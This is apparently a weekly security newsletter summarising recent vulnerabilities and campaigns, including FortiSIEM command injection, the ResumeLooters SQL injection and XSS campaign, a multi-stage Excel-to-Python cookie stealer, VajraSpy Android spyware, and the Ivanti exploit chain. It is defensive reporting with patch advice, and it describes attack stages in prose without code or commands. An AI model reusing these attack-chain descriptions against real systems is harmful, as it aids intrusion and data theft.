Insights into a malicious campaign dubbed ResumeLooters, targeting job search platforms, potentially compromising sensitive information of job seekers.
🚨 Vulnerability of the Week
Fortinet FortiSIEM, versions 6.4.0 through 7.1.1, has been found vulnerable to an “improper neutralization of special elements used in an OS command” (OS command injection) flaw. This vulnerability allows attackers to execute unauthorized code or commands through crafted API requests, posing a significant security risk to affected systems.
The vulnerability (CWE-78) stems from improper neutralization of special elements in OS commands, which can be exploited by remote unauthenticated attackers via crafted API requests.
Affected versions include FortiSIEM 6.4.0 through 6.4.2, 6.5.0 through 6.5.2, 6.6.0 through 6.6.3, 6.7.0 through 6.7.8, 7.0.0 through 7.0.2, and 7.1.0 through 7.1.1.
Exploiting this vulnerability could lead to the execution of unauthorized commands or code on the targeted system, potentially compromising its security and integrity.
FortiSIEM versions 6.4.0 through 6.4.2
FortiSIEM versions 6.5.0 through 6.5.2
FortiSIEM versions 6.6.0 through 6.6.3
FortiSIEM versions 6.7.0 through 6.7.8
FortiSIEM versions 7.0.0 through 7.0.2
FortiSIEM versions 7.1.0 through 7.1.1
Fortinet recommends upgrading to the following versions or above to mitigate the vulnerability:
FortiSIEM 7.1.2 or above
Upcoming FortiSIEM 7.2.0 or above
Upcoming FortiSIEM 7.0.3 or above
Upcoming FortiSIEM 6.7.9 or above
Upcoming FortiSIEM 6.6.5 or above
Upcoming FortiSIEM 6.5.3 or above
Upcoming FortiSIEM 6.4.4 or above
Fortinet acknowledges the responsible disclosure of this vulnerability by security researcher Zach Hanley (@hacks_zach) of Horizon3.ai.
In November 2023, Group-IB’s Threat Intelligence unit identified a significant malicious campaign targeting employment agencies and retail companies in the Asia-Pacific (APAC) region. This campaign aimed to steal and sell sensitive user data, particularly from job seekers. The threat actor behind this campaign, identified as ResumeLooters, utilized tactics including SQL injection attacks and Cross-Site Scripting (XSS) to compromise websites and extract personal data and CVs.
ResumeLooters has been active since early 2023, with a focus on conducting SQL injection and XSS attacks against recruitment and retail websites primarily in the Asia-Pacific region.
Between November and December 2023, the gang successfully compromised 65 websites, stealing a total of 2,188,444 rows of data, including 510,259 rows of user data from job search websites.
The main targets of ResumeLooters are companies in India, Taiwan, Thailand, and Vietnam, although compromised companies were also identified in other regions such as Brazil, the USA, Turkey, Russia, Mexico, and Italy.
The group employs various penetration testing tools on their malicious servers, including sqlmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL (Asset Reconnaissance Lighthouse), and Dirsearch.
SQL injection via sqlmap is the group’s primary initial vector for compromising websites, with XSS scripts also being injected into legitimate job search websites.
Analysis of stolen HTML files revealed the execution of malicious XSS scripts on at least four websites, indicating attempts to obtain admin credentials through phishing forms.
The attackers advertised the sale of compromised data in Chinese-speaking hacking-themed Telegram groups.
Art of Detection
In January 2024, FortiGuard Labs identified a sophisticated malware campaign orchestrated by a Vietnamese-based hacking group, previously active in August and September 2023. This campaign, facilitated through a malicious Excel document, presents a significant cybersecurity threat due to its use of multi-stage downloaders and obfuscation techniques.
Initial Attack Vector:
The campaign begins with a malicious Excel document containing a VBA script, which triggers the execution of a PowerShell command. This command downloads a seemingly innocuous file, Windows Update.bat, from filebin.net.
Windows Update.bat serves as the initial gateway, hiding its true intentions beneath layers of obfuscation. Abobus obfuscator, non-English characters, and escape characters obscure the malicious code.
Upon execution, Windows Update.bat downloads test.vbs, which orchestrates a triple download. It retrieves script.py (the info-stealer), Document.zip (Python 3.11 with required libraries), and bypass.vbs (the Python executor).
Script.py, reminiscent of a previous campaign in August 2023, is designed to steal browser cookies and login data. It targets a wide range of browsers, including localized ones like the Cốc Cốc browser.
The stolen data is compressed and sent to an attacker-controlled Telegram bot.
Insight into Hacker Group:
The campaign draws from open platforms, offering insights into the hacker group’s activities. Repositories and files related to the campaign reveal similarities with other malware such as XWorm, VenomRat, and RedLine.
🥷 TTP Analysis
ESET researchers, led by @LukasStefanko
ESET researchers uncovered twelve Android apps harboring the VajraSpy Remote Access Trojan (RAT) utilized by the Patchwork APT group.
Six of these apps were previously available on Google Play, accumulating over 1,400 installs before removal.
Except for one news app, the rest were promoted as chat applications.
Shared malicious code and class names indicate belonging to the VajraSpy malware family.
Customizable RAT employed by the Patchwork APT group.
Functionality varies based on permission settings, enabling data exfiltration such as contacts, files, SMS messages, call recording, and photo capture.
Apps surfaced online between April 2021 and October 2023.
Predominantly targeted users in Pakistan.
Tactics included using the name of a prominent Pakistani cricket player as a developer and defaulting to the PK country calling code on login screens.
Android users, particularly in Pakistan, should remain vigilant and verify the authenticity of apps before installation.
Employ security measures and consider utilizing reputable antivirus software to detect and prevent RAT infections.
CVE Identifier: CVE-2024-23832 (CVSS: 9.4)
Origin validation error in Mastodon, potentially leading to account takeover.
Severity rated as critical (CVSS score of 9.4), indicating significant risk.
Specific details of the vulnerability to be disclosed on February 15, 2024.
All Mastodon versions prior to 3.5.17
Includes versions 4.0.x before 4.0.13, 4.1.x before 4.1.13, and 4.2.x before 4.2.5
Mastodon is an open-source social network with decentralized servers.
Admins manage separate servers with individual rules.
Gained popularity as an alternative to Twitter, particularly within the security community.
Response and Mitigation:
Mastodon urges administrators to promptly update servers to secure versions.
Specific details withheld to allow time for server updates.
Discovery credited to ‘arcaniscanis.’
Mastodon server administrators should prioritize updating to secure versions.
Await further details on the vulnerability’s specifics on February 15, 2024, for comprehensive understanding and mitigation.
Credit to ‘arcaniscanis’ for discovering the vulnerability.
Collaboration between Mastodon and the security community in addressing the issue.
🌶️ Trending Exploit
CVE-2024-21893: Server-Side Request Forgery (SSRF) in the Security Assertion Markup Language (SAML) component.
Exploitation through a chain of vulnerabilities: authentication bypass (CVE-2023-46805) and command injection (CVE-2024-21887) leading to unauthenticated remote code execution.
Initial exploitation through authentication bypass and command injection vulnerabilities.
New SSRF technique (CVE-2024-21893) discovered to bypass Ivanti’s original mitigation.
Chaining SSRF to execute arbitrary commands, including Python-based reverse shell payloads.
Mitigation and Remediation:
Ivanti released a mitigation file addressing CVE-2023-46805 and CVE-2024-21887 before issuing official patches.
Second mitigation released to prevent both exploit chains.
Official patches released to address all vulnerabilities.
Verification by Rapid7 that the second mitigation effectively blocks the described exploit chain.
Remediation includes applying the second mitigation and installing the official patch.
Apply the second mitigation provided by Ivanti.
Install the official patch to address all known vulnerabilities.
Refer to Ivanti’s knowledge base article for detailed guidance on mitigation and patching.
Credit to security researchers and collaboration between Ivanti and Mandiant in identifying and addressing these vulnerabilities.
🕯️ The Topic of the Week
AnyDesk, a popular remote access solution used by enterprises worldwide, recently experienced a cyberattack resulting in the theft of source code and private code signing keys. The attack was detected by the company after indications of an incident on their production servers. This report summarizes the incident, AnyDesk’s response, and recommendations for users.
AnyDesk detected indications of a cyberattack on their production servers and initiated a security audit.
Source code and private code signing keys were stolen by threat actors during the attack.
The company confirmed that ransomware was not involved in the incident.
AnyDesk engaged cybersecurity firm CrowdStrike to assist in responding to the attack.
Security-related certificates were revoked, and affected systems were remediated or replaced.
AnyDesk assured customers that their platform was safe to use and that there was no evidence of end-user devices being affected.
The company advised users to ensure they are using the latest version of AnyDesk with the new code signing certificate.
As a precautionary measure, AnyDesk revoked all passwords to their web portal and recommended users change passwords if reused on other sites.
AnyDesk explained that session authentication tokens, crucial for the platform’s security, were not stolen during the attack.
The company replaced stolen code signing certificates, as indicated in version 8.0.8 released on January 29th.
Users are strongly advised to update to the latest version of AnyDesk to ensure continued security.
AnyDesk suffered a four-day outage starting on January 29th, during which users were unable to log in to the AnyDesk client.
Access was restored after maintenance, which was confirmed to be related to the cybersecurity incident.
Recommendations for Users:
Users should update to the latest version of AnyDesk to benefit from enhanced security measures.
Changing passwords for AnyDesk accounts and other platforms where the same password is used is recommended as a precautionary measure.